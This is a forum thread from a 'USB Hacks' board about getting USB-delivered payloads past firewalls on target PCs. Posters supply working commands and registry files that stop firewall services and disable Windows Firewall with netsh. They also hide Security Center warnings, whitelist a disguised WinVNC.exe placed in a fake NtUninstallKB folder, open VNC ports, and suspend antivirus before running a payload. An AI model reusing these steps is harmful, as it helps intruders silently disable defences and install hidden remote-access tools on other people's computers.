Jump to content

Firewalled PC

Shiva

By Shiva
in USB Hacks

 Share

Recommended Posts

Shiva Newbie

Shiva

Posted
  • Author
Posted

erm ... for Net Stop to work u hafta know the other's pc's Username & pwd and u hafta do it from an an account that belongs to the Administrator's grp.

Also, if ya kill the FW, especially on boxes with SP2 installed, da Security Centre's msgs's will kick in n start displaying not loaded or some such msg. It may also start Windows own "firewall" if it can b considered a fw at all - lol.

Any other thoughts on this?

thx in adv

Link to comment
Share on other sites
pseudobreed Newbie

pseudobreed

Posted
Posted
erm ... for Net Stop to work u hafta know the other's pc's Username & pwd and u hafta do it from an an account that belongs to the Administrator's grp.

The payload is executed by a local admin account. You dont have to have a username and password, it will use the default profile credentials.

Just add "net stop service" at the top of your payload, and then you can "net start service" at the end to put the firewall back to normal.

The only issue is if the firewall has a task tray icon (And I dont know many that dont). Once you stop the service, the icon changes to show the status of the firewall.

Link to comment
Share on other sites
Catcheral Newbie

Catcheral

Posted
Posted
You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"

Do you know the service name for the windows firewall?

Link to comment
Share on other sites
remkow Newbie

remkow

Posted
Posted

You don't have to disable the windows firewall, just add some registry entries and ur set. When using the WinVNC payload, you only have to add this registry file: 

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirew
allPolicyStandardProfileAuthorizedApplicationsList]

"%systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVNC.exe"="%systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVNC.exe:*:Enabled:WinVnc"

"%appdata%NtUninstallKB21050c07160c070f0b0a0a05031b05WinVNC.exe"="%appdata%NtUninstallK21050c07160c070f0b0a0a05031b05WinVNC.exe:*:Enabled:WinVnc"

Just save it as vnc.reg, and in your go.cmd import it using "reg import vnc.reg" or "regedit /s vnc.reg".

Link to comment
Share on other sites
Catcheral Newbie

Catcheral

Posted
Posted

What i want to do is just to disable the firewall for a short space of time, not using the switchblade or hacksaw.

But im doing somthing else that is blocked by the firewall, and the message is : For your protection windows firewall ahs blocked this operation' or somthing along those lines.

And i want to know if there is a way to turn it off, do what i want to do, and turn it back on again, by using a batch file etc.

Link to comment
Share on other sites
remkow Newbie

remkow

Posted
Posted

I'm not using Windows Firewall myself, but I think that this should disable it:

netsh firewall set opmode disable

And to prevent the security center from popping up use this registry file:

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center]

"FirewallDisableNotify"=dword:00000001

Link to comment
Share on other sites
Shiva Newbie

Shiva

Posted
  • Author
Posted
I'm not using Windows Firewall myself, but I think that this should disable it:

netsh firewall set opmode disable

kewl thx :D

And to prevent the security center from popping up use this registry file:

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center]

"FirewallDisableNotify"=dword:00000001

thx again :D

Link to comment
Share on other sites
Shiva Newbie

Shiva

Posted
  • Author
Posted
You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"

Do you know the service name for the windows firewall?

Just as a side note, if you know the admin pwd of a remote box which has remote registry enabled ( i think its enabled by default ) then u can use PSList from http:www.SysInternals.com to get a list of services running on dat box n snipe em one by 1.

Link to comment
Share on other sites
Spartain X Newbie

Spartain X

Posted
Posted

i relly think you are better off using the netsh command then using premade registry entries, because of the chances that the comp does not successfully apply the reg key it could screwed up and the box is FUBAR.

also for the problem with firewalls i have just made a quick batch that pauses or suspends AV's, Spyware and firewall process / service and launch the payload and then a call a batch that resumes or starts the process's / services

Link to comment
Share on other sites
Catcheral Newbie

Catcheral

Posted
Posted
I'm not using Windows Firewall myself, but I think that this should disable it:

netsh firewall set opmode disable

And to prevent the security center from popping up use this registry file:

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center]

"FirewallDisableNotify"=dword:00000001

that worked. Cheers =]

Link to comment
Share on other sites
remkow Newbie

remkow

Posted
Posted
that worked. Cheers =]

No problem m8 :wink:

i relly think you are better off using the netsh command then using premade registry entries, because of the chances that the comp does not successfully apply the reg key it could screwed up and the box is FUBAR.

also for the problem with firewalls i have just made a quick batch that pauses or suspends AV's, Spyware and firewall process / service and launch the payload and then a call a batch that resumes or starts the process's / services

Can you post it?? I'm making one too, but I don't have a lot of different av/fws to test it with.

Link to comment
Share on other sites
Spartain X Newbie

Spartain X

Posted
Posted

if you follow a similar syntax you should be able to add any port you like

netsh firewall add portopening TCP 5900 SMBv1

netsh firewall add portopening TCP 5800 SMBv2

netsh firewall add portopening UDP 5900 RDPv1

netsh firewall add portopening UDP 5800 RDPv2

it's basically "netsh firewall add portopening" and the the protocol then port then the comment. btw this is an example of how to apply it so vnc, btw tvnc does not use udp but i included it as an example

Link to comment
Share on other sites
majk Newbie

majk

Posted
Posted
if you follow a similar syntax you should be able to add any port you like

netsh firewall add portopening TCP 5900 SMBv1

netsh firewall add portopening TCP 5800 SMBv2

netsh firewall add portopening UDP 5900 RDPv1

netsh firewall add portopening UDP 5800 RDPv2

it's basically "netsh firewall add portopening" and the the protocol then port then the comment. btw this is an example of how to apply it so vnc, btw tvnc does not use udp but i included it as an example

But doesn't that only work with Windows built in firewall?
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...